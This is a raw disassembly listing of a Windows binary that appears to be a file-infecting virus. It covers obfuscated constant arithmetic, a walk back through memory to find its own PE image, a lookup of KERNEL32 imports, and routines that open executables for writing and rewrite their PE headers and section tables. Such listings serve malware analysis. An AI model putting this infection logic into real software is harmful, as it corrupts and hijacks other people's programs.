loc_44050C: ; CODE XREF: sub_44047F+47�j
pop edi
pop esi
pop ebx
leave
retn
sub_44047F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440511 proc near ; CODE XREF: sub_439B7B+1CA�p
; sub_43AF47+2D9�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_442F6C
push ebx
push esi
push edi
push offset dword_44A8A8
call sub_43C507
push eax
lea edi, [ebp+var_FFF]
push edi
call ds:dword_449634
add esp, 0Ch
mov esi, dword_44A1B8
sub esi, 5
jmp short loc_440561
; ---------------------------------------------------------------------------
loc_440547: ; CODE XREF: sub_440511+56�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_440560
mov eax, dword_44A1F8
sub eax, 3
mov [ebp+esi+var_FFF], al
loc_440560: ; CODE XREF: sub_440511+3E�j
inc esi
loc_440561: ; CODE XREF: sub_440511+34�j
cmp esi, 0FFFh
jb short loc_440547
mov eax, dword_44A1B8
sub eax, 5
mov [ebp+var_1004], eax
mov eax, dword_44A0C4
mov ebx, eax
add ebx, dword_44A0C8
sub ebx, 7
cmp [ebp+arg_0], 0
jnz short loc_4405E6
loc_44058D: ; CODE XREF: sub_440511+D3�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_4405AF
lea eax, [ebp+ebx+var_FFF]
push eax
push offset dword_449670
call sub_442F8C
jmp loc_440839
; ---------------------------------------------------------------------------
loc_4405AF: ; CODE XREF: sub_440511+85�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4405B9: ; CODE XREF: sub_440511+AD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4405B9
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, dword_44A15C
sub edx, 9
cmp eax, edx
jz loc_440839
jmp short loc_44058D
; ---------------------------------------------------------------------------
loc_4405E6: ; CODE XREF: sub_440511+7A�j
mov eax, dword_44A350
mov [ebp+var_1008], eax
mov eax, dword_44A210
add eax, dword_44A268
sub eax, 5
mov edx, [ebp+arg_0]
mov ecx, dword_44A0D4
sub ecx, 6
mov [edx+eax], cl
mov eax, dword_44A09C
mov ebx, eax
add ebx, dword_44A18C
sub ebx, 5
mov eax, dword_44A1D0
add eax, dword_44A12C
sub eax, 0Fh
mov [ebp+var_1004], eax
loc_440632: ; CODE XREF: sub_440511+300�j
push offset byte_44A89D
call sub_43C507
push eax
lea edi, [ebp+var_110B]
push edi
call sub_442F8C
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call ds:dword_444020
add esp, 0Ch
call ds:dword_449BAC
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, dword_44A090
add eax, dword_44A220
sub eax, 5
cmp edx, eax
jnb loc_440764
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_43ABE3
mov eax, dword_44A19C
movsx edx, word_44A230
add eax, edx
sub eax, 0Bh
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_4384B5
add esp, 14h
mov edi, dword_44A220
add edi, 0FFFBh
cmp eax, edi
jnz short loc_4406F8
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_444020
push offset dword_44A898
call sub_43C507
push eax
push [ebp+arg_0]
call ds:dword_444020
add esp, 14h
loc_4406F8: ; CODE XREF: sub_440511+1BE�j
mov eax, dword_44A0DC
sub eax, 2
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_4384B5
add esp, 0Ch
mov edi, dword_44A19C
add edi, 0FFF9h
cmp eax, edi
jnz short loc_44075E
push offset byte_44A88D
call sub_43C507
push eax
push [ebp+arg_0]
call ds:dword_444020
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call ds:dword_444020
push offset dword_44A888
call sub_43C507
push eax
push [ebp+arg_0]
call ds:dword_444020
add esp, 20h
loc_44075E: ; CODE XREF: sub_440511+210�j
inc [ebp+var_1008]
loc_440764: ; CODE XREF: sub_440511+174�j
push [ebp+var_1004]
call sub_43CCC9
pop ecx
mov [ebp+var_100C], eax
mov ecx, dword_44A1A8
cmp eax, ecx
jnb short loc_4407DC
movsx eax, word_44A150
sub eax, 7
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_4384B5
add esp, 0Ch
movsx edi, word_44A208
mov edx, dword_44A13C
lea edi, [edi+edx+0FFF7h]
cmp eax, edi
jnz short loc_4407DC
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call ds:dword_444020
push offset byte_44A883
call sub_43C507
push eax
push [ebp+arg_0]
call ds:dword_444020
add esp, 14h
loc_4407DC: ; CODE XREF: sub_440511+26D�j
; sub_440511+2A2�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4407E6: ; CODE XREF: sub_440511+2DA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4407E6
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, dword_44A26C
add edx, dword_44A090
sub edx, 0Ch
cmp eax, edx
jnz loc_440632
push offset word_44A87E
call sub_43C507
push eax
push [ebp+arg_0]
call ds:dword_444020
add esp, 0Ch
mov eax, [ebp+var_1008]
mov dword_44A350, eax
loc_440839: ; CODE XREF: sub_440511+99�j
; sub_440511+CD�j
pop edi
pop esi
pop ebx
leave
retn
sub_440511 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44083E proc near ; CODE XREF: start+1�p
var_138 = dword ptr -138h
var_133 = byte ptr -133h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_127 = byte ptr -127h
var_124 = byte ptr -124h
var_122 = byte ptr -122h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, sub_43EC0A
mov [ebp+var_10], eax
mov edx, eax
movsx ecx, word_44A160
add ecx, 0Fh
mov eax, edx
shr eax, cl
movsx edx, word_44A124
add edx, 0Ah
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_440873: ; CODE XREF: sub_44083E+4D�j
; sub_44083E+7D�j ...
mov [ebp+var_18], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_44088D
mov eax, dword_44A188
add eax, 10000h
sub ebx, eax
jmp short loc_440873
; ---------------------------------------------------------------------------
loc_44088D: ; CODE XREF: sub_44083E+3F�j
mov eax, dword_44A15C
add eax, 2Dh
add eax, dword_44A288
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp+var_14], eax
mov ecx, [ebp+var_10]
cmp eax, ecx
jbe short loc_4408BD
movsx eax, word_44A0E8
add eax, 0FFFFh
sub ebx, eax
jmp short loc_440873
; ---------------------------------------------------------------------------
loc_4408BD: ; CODE XREF: sub_44083E+6D�j
mov eax, [ebp+var_14]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_4408DD
movsx eax, word_44A218
add eax, 0FFFBh
sub ebx, eax
jmp short loc_440873
; ---------------------------------------------------------------------------
loc_4408DD: ; CODE XREF: sub_44083E+8D�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_C], eax
movsx eax, word_44A174
sub eax, 7
mov [ebp+var_4], eax
jmp loc_440A7A
; ---------------------------------------------------------------------------
loc_4408FB: ; CODE XREF: sub_44083E+248�j
mov eax, ebx
add eax, [ebp+var_C]
add eax, [ebp+var_4]
mov [ebp+var_12C], eax
mov edx, dword_44A12C
movsx ecx, word_44A180
add edx, ecx
sub edx, 0Ch
cmp [eax], edx
jz loc_440A8C
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp+var_130], edx
push edx
lea eax, [ebp+var_127]
push eax
call sub_442F8C
mov eax, dword_44A1AC
add eax, dword_44A164
sub eax, 9
mov [ebp+var_28], eax
jmp short loc_440976
; ---------------------------------------------------------------------------
loc_440954: ; CODE XREF: sub_44083E+157�j
mov eax, [ebp+var_28]
mov al, [ebp+eax+var_127]
cmp al, 61h
jle short loc_440973
cmp al, 7Ah
jge short loc_440973
mov eax, [ebp+var_28]
lea eax, [ebp+eax+var_127]
sub byte ptr [eax], 20h
loc_440973: ; CODE XREF: sub_44083E+122�j
; sub_44083E+126�j
inc [ebp+var_28]
loc_440976: ; CODE XREF: sub_44083E+114�j
mov eax, [ebp+var_28]
movsx eax, [ebp+eax+var_127]
mov edx, dword_44A164
movsx ecx, word_44A1B4
add edx, ecx
sub edx, 8
cmp eax, edx
jnz short loc_440954
mov eax, dword_44A120
movsx edx, word_44A0CC
add eax, edx
cmp [ebp+eax+var_133], 4Bh
jnz loc_440A76
mov eax, dword_44A09C
cmp byte ptr [ebp+eax+var_12C+1], 45h
jnz loc_440A76
mov eax, dword_44A0EC
cmp byte ptr [ebp+eax+var_12C+3], 52h
jnz loc_440A76
mov eax, dword_44A138
cmp [ebp+eax+var_122], 4Ch
jnz loc_440A76
mov eax, dword_44A1F8
cmp [ebp+eax+var_124], 33h
jnz short loc_440A76
mov eax, dword_44A210
add eax, 4
add eax, dword_44A1A8
cmp [ebp+eax+var_127], 32h
jnz short loc_440A76
mov eax, [ebp+var_12C]
mov edx, ebx
add edx, [eax+10h]
mov [ebp+var_138], edx
mov eax, dword_44A204
dec eax
mov [ebp-134h], eax
loc_440A30: ; CODE XREF: sub_44083E+234�j
mov eax, [ebp+var_138]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, dword_44A198
sub eax, 2
cmp edi, eax
jz short loc_440A8C
push edi
call sub_43A5C3
pop ecx
cmp dword_44A294, 0
jnz short loc_440A8C
movsx eax, word_44A130
add eax, dword_44A110
sub eax, 4
add [ebp-134h], eax
jmp short loc_440A30
; ---------------------------------------------------------------------------
jmp short loc_440A8C
; ---------------------------------------------------------------------------
loc_440A76: ; CODE XREF: sub_44083E+16F�j
; sub_44083E+182�j ...
add [ebp+var_4], 14h
loc_440A7A: ; CODE XREF: sub_44083E+B8�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_4], eax
jb loc_4408FB
loc_440A8C: ; CODE XREF: sub_44083E+DF�j
; sub_44083E+20C�j ...
cmp dword_44A294, 0
jz short loc_440AED
call sub_43A105
call sub_43EF62
call sub_4396F6
mov edx, eax
mov [ebp+var_19], dl
movzx eax, [ebp+var_19]
mov edx, dword_44A140
add edx, dword_44A204
sub edx, 8
cmp eax, edx
jz short loc_440AED
lea eax, [ebp+var_24]
push eax
mov eax, dword_44A1BC
add eax, dword_44A0AC
sub eax, 0Ah
push eax
lea eax, [ebp+var_20]
push eax
push offset sub_43EC0A
mov eax, dword_44A110
sub eax, 5
push eax
push 0
call ds:dword_449B90 ; CreateThread
loc_440AED: ; CODE XREF: sub_44083E+255�j
; sub_44083E+280�j
pop edi
pop esi
pop ebx
leave
retn
sub_44083E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440AF2 proc near ; CODE XREF: sub_43D058+CD�p
; sub_43D058+122�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_440B08: ; CODE XREF: sub_440AF2+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440B08
mov [ebp+var_4], eax
mov edi, dword_44A1D4
sub edi, 2
jmp short loc_440B8D
; ---------------------------------------------------------------------------
loc_440B1D: ; CODE XREF: sub_440AF2+9E�j
movzx eax, [ebp+arg_8]
cmp edi, eax
jb short loc_440B30
mov al, [esi+edi]
cmp al, 2Fh
jz short loc_440B30
cmp al, 2Eh
jnz short loc_440B4F
loc_440B30: ; CODE XREF: sub_440AF2+31�j
; sub_440AF2+38�j
push offset dword_44A878
call sub_43C507
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call ds:dword_449634
add esp, 10h
jmp short loc_440B7E
; ---------------------------------------------------------------------------
loc_440B4F: ; CODE XREF: sub_440AF2+3C�j
push offset byte_44A873
call sub_43C507
push eax
push ebx
call ds:dword_444020
push offset byte_44A86B
call sub_43C507
movzx edx, byte ptr [esi+edi]
push edx
push eax
lea edx, [ebp+var_7]
push edx
call ds:dword_449634
add esp, 1Ch
loc_440B7E: ; CODE XREF: sub_440AF2+5B�j
lea eax, [ebp+var_7]
push eax
push ebx
call ds:dword_444020
add esp, 8
inc edi
loc_440B8D: ; CODE XREF: sub_440AF2+29�j
cmp edi, [ebp+var_4]
jb short loc_440B1D
pop edi
pop esi
pop ebx
leave
retn
sub_440AF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440B97 proc near ; CODE XREF: sub_439B7B+188�p
var_170 = byte ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_446600 ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_43F85A
push offset word_44A866
call sub_43C507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_444020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_444020
push offset word_44A85E
call sub_43C507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_444020
add esp, 24h
push 0
mov eax, dword_44A0F0
add eax, dword_44A158
sub eax, 0Ah
push eax
push 3
push 0
mov eax, dword_44A1E8
add eax, dword_44A0D4
sub eax, 7
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_449788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_440C5E
mov eax, dword_44A268
sub eax, 4
mov edx, [ebp+arg_0]
mov ecx, dword_44A288
sub ecx, 6
mov [edx+eax], cl
jmp short loc_440CCB
; ---------------------------------------------------------------------------
loc_440C5E: ; CODE XREF: sub_440B97+AC�j
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_449B9C ; SetFilePointer
push 0
lea eax, [ebp+var_170]
push eax
mov eax, dword_44A194
add eax, 0Bh
push eax
push [ebp+arg_0]
push edi
call ds:dword_444028 ; ReadFile
mov [ebp+var_16C], eax
push edi
call ds:dword_448654 ; CloseHandle
mov eax, dword_44A0F8
add eax, dword_44A234
sub eax, 0Bh
cmp [ebp+var_16C], eax
jnz short loc_440CCB
mov eax, dword_44A1A8
sub eax, 2
mov edx, [ebp+arg_0]
mov ecx, dword_44A09C
movsx ebx, word_44A0BC
add ecx, ebx
sub ecx, 0Eh
mov [edx+eax], cl
loc_440CCB: ; CODE XREF: sub_440B97+C5�j
; sub_440B97+112�j
pop edi
pop esi
pop ebx
leave
retn
sub_440B97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440CD0 proc near ; DATA XREF: .data:off_44A354�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44BAC8
push esi
call ds:dword_449648
or eax, eax
jz short loc_440CFC
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440D44
; ---------------------------------------------------------------------------
loc_440CFC: ; CODE XREF: sub_440CD0+1A�j
push offset dword_44BA48
push esi
call ds:dword_449648
or eax, eax
jz short loc_440D1C
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440D44
; ---------------------------------------------------------------------------
loc_440D1C: ; CODE XREF: sub_440CD0+3A�j
push offset dword_44BA28
push esi
call ds:dword_449648
or eax, eax
jz short loc_440D3C
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_440D44
; ---------------------------------------------------------------------------
loc_440D3C: ; CODE XREF: sub_440CD0+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_440D44: ; CODE XREF: sub_440CD0+2A�j
; sub_440CD0+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_440CD0 endp
; =============== S U B R O U T I N E =======================================
sub_440D4B proc near ; CODE XREF: sub_43EC0A+20�p
push edi
push offset byte_44A853
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A2AC, eax
test eax, eax
jnz short loc_440D7E
push offset dword_44A848
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A2AC, eax
loc_440D7E: ; CODE XREF: sub_440D4B+1A�j
cmp dword_44A2AC, 0
jz short loc_440DA4
push offset word_44A832
call sub_43C507
pop ecx
push eax
push dword_44A2AC
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446604, eax
loc_440DA4: ; CODE XREF: sub_440D4B+3A�j
pop edi
retn
sub_440D4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440DA6 proc near ; CODE XREF: sub_43AF47+11B�p
; DATA XREF: sub_439B7B+CC�o
var_270 = byte ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 270h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_446600 ; GetSystemDirectoryA
lea eax, [ebp+var_267]
push eax
call sub_43F85A
push offset byte_44A82D
call sub_43C507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_444020
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_444020
push offset byte_44A825
call sub_43C507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_444020
add esp, 24h
push 0
mov eax, dword_44A154
add eax, dword_44A1F8
sub eax, 0Ah
push eax
push 3
push 0
mov eax, dword_44A1E8
dec eax
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_449788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_440E52
mov eax, 2Ah
jmp short loc_440EBD
; ---------------------------------------------------------------------------
loc_440E52: ; CODE XREF: sub_440DA6+A3�j
push 0
lea eax, [ebp+var_270]
push eax
push 0FFh
lea eax, [ebp+var_203]
push eax
push edi
call ds:dword_444028 ; ReadFile
mov [ebp+var_26C], eax
push edi
call ds:dword_448654 ; CloseHandle
mov eax, dword_44A1A0
sub eax, 3
cmp [ebp+var_26C], eax
jnz short loc_440E92
mov eax, 2Ah
jmp short loc_440EBD
; ---------------------------------------------------------------------------
loc_440E92: ; CODE XREF: sub_440DA6+E3�j
movzx eax, [ebp+var_203]
movsx edx, word_44A098
movsx ecx, word_44A174
lea edx, [edx+ecx+18h]
cmp eax, edx
jge short loc_440EB6
mov eax, 2Ah
jmp short loc_440EBD
; ---------------------------------------------------------------------------
loc_440EB6: ; CODE XREF: sub_440DA6+107�j
movzx eax, [ebp+var_203]
loc_440EBD: ; CODE XREF: sub_440DA6+AA�j
; sub_440DA6+EA�j ...
pop edi
pop esi
leave
retn
sub_440DA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440EC1 proc near ; DATA XREF: .data:0044A37C�o
push ebp
mov ebp, esp
mov eax, dword_44A0F4
sub eax, 7
cmp ds:dword_449BA8, eax
jbe short loc_440EDF
push offset dword_449BA8
call ds:dword_444010 ; InterlockedDecrement
loc_440EDF: ; CODE XREF: sub_440EC1+11�j
mov eax, ds:dword_449BA8
pop ebp
retn 4
sub_440EC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440EE8 proc near ; DATA XREF: .data:0044A38C�o
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_4]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44A24C
mov edx, dword_44A0B4
lea eax, [eax+edx+0E9h]
cmp edi, eax
jnz short loc_440F1B
push [ebp+arg_14]
call sub_43858C
pop ecx
xor eax, eax
jmp short loc_440F41
; ---------------------------------------------------------------------------
loc_440F1B: ; CODE XREF: sub_440EE8+24�j
mov eax, dword_44A0B4
add eax, 0F5h
add eax, dword_44A14C
cmp edi, eax
jnz short loc_440F3C
push [ebp+arg_14]
call sub_43A974
pop ecx
xor eax, eax
jmp short loc_440F41
; ---------------------------------------------------------------------------
loc_440F3C: ; CODE XREF: sub_440EE8+45�j
mov eax, 80020003h
loc_440F41: ; CODE XREF: sub_440EE8+31�j
; sub_440EE8+52�j
pop edi
pop ebp
retn 24h
sub_440EE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440F46 proc near ; CODE XREF: sub_44029C+1D0�p
var_32014 = byte ptr -32014h
var_32011 = byte ptr -32011h
var_32010 = dword ptr -32010h
var_3200C = dword ptr -3200Ch
var_32007 = byte ptr -32007h
var_32006 = byte ptr -32006h
var_31F58 = dword ptr -31F58h
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = byte ptr -31ED4h
var_31EC7 = byte ptr -31EC7h
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 32010h
call sub_442F6C
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC7]
push eax
call ds:dword_448638
add esp, 0Ch
push 0
mov eax, dword_44A09C
sub eax, 5
push eax
push 3
push 0
mov eax, dword_44A234
add eax, dword_44A284
sub eax, 0Dh
push eax
push 0C0000001h
push [ebp+arg_0]
call ds:dword_449788 ; CreateFileA
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_440FAA
xor eax, eax
jmp loc_442439
; ---------------------------------------------------------------------------
loc_440FAA: ; CODE XREF: sub_440F46+5B�j
push 0
push [ebp+var_1070]
call ds:dword_449624 ; GetFileSize
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call ds:dword_446A34 ; LocalAlloc
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_444028 ; ReadFile
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31EDC]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_442422
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_442422
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
movsx edx, word_44A0CC
sub edx, 6
cmp eax, edx
jz loc_442422
and [ebp+var_1180], 0
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
mov ecx, dword_44A238
add ecx, 7
add ecx, dword_44A0D4
cmp edx, ecx
jnz short loc_4410A5
mov edx, dword_44A0C4
inc edx
mov [eax+1Ah], dl
cmp dl, 0
jz short loc_4410A5
movzx eax, word ptr [eax+46h]
mov [ebp+var_31EEC], eax
movsx eax, word_44A22C
movsx edx, word_44A0FC
add eax, edx
sub eax, 0Bh
cmp [ebp+var_31EEC], eax
jnb loc_442422
mov [ebp+var_1180], 1
loc_4410A5: ; CODE XREF: sub_440F46+11B�j
; sub_440F46+12A�j
cmp [ebp+var_1180], 0
jz short loc_4410C6
mov eax, [ebp+var_8]
add eax, 6
movzx edx, word ptr [eax]
movsx ecx, word_44A0C0
add ecx, 2
sub edx, ecx
mov [eax], dx
loc_4410C6: ; CODE XREF: sub_440F46+166�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EEC], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF4], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EF0], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EF8], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31F00], edx
mov eax, [ebp+var_31EEC]
mov [ebp+var_31EFC], eax
mov ecx, dword_44A0B8
movsx edi, word_44A240
add ecx, edi
dec ecx
mul ecx
mov [ebp+var_31F04], eax
mov eax, [ebp+var_31F00]
mov edx, [ebp+var_31F04]
add eax, edx
mov edx, [ebp+var_31EF4]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_442422
mov eax, dword_44A128
movsx edx, word_44A1E0
add eax, edx
sub eax, 0Ch
mov [ebp+var_20], eax
movsx eax, word_44A260
add eax, dword_44A1B0
sub eax, 9
mov [ebp+var_C54], eax
mov eax, dword_44A238
mov [ebp+var_105C], eax
mov eax, dword_44A1D8
movsx edx, word_44A208
add eax, edx
sub eax, 0Eh
mov [ebp+var_434], eax
jmp loc_44126B
; ---------------------------------------------------------------------------
loc_4411A9: ; CODE XREF: sub_440F46+332�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F10], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F10]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F08], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F08], eax
jbe short loc_441200
mov eax, [ebp+var_31F08]
mov [ebp+var_20], eax
loc_441200: ; CODE XREF: sub_440F46+2AF�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F0C], eax
jbe short loc_44121A
mov eax, [ebp+var_31F0C]
mov [ebp+var_C54], eax
loc_44121A: ; CODE XREF: sub_440F46+2C6�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_441245
cmp eax, [ebp+var_31F08]
jnb short loc_441245
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
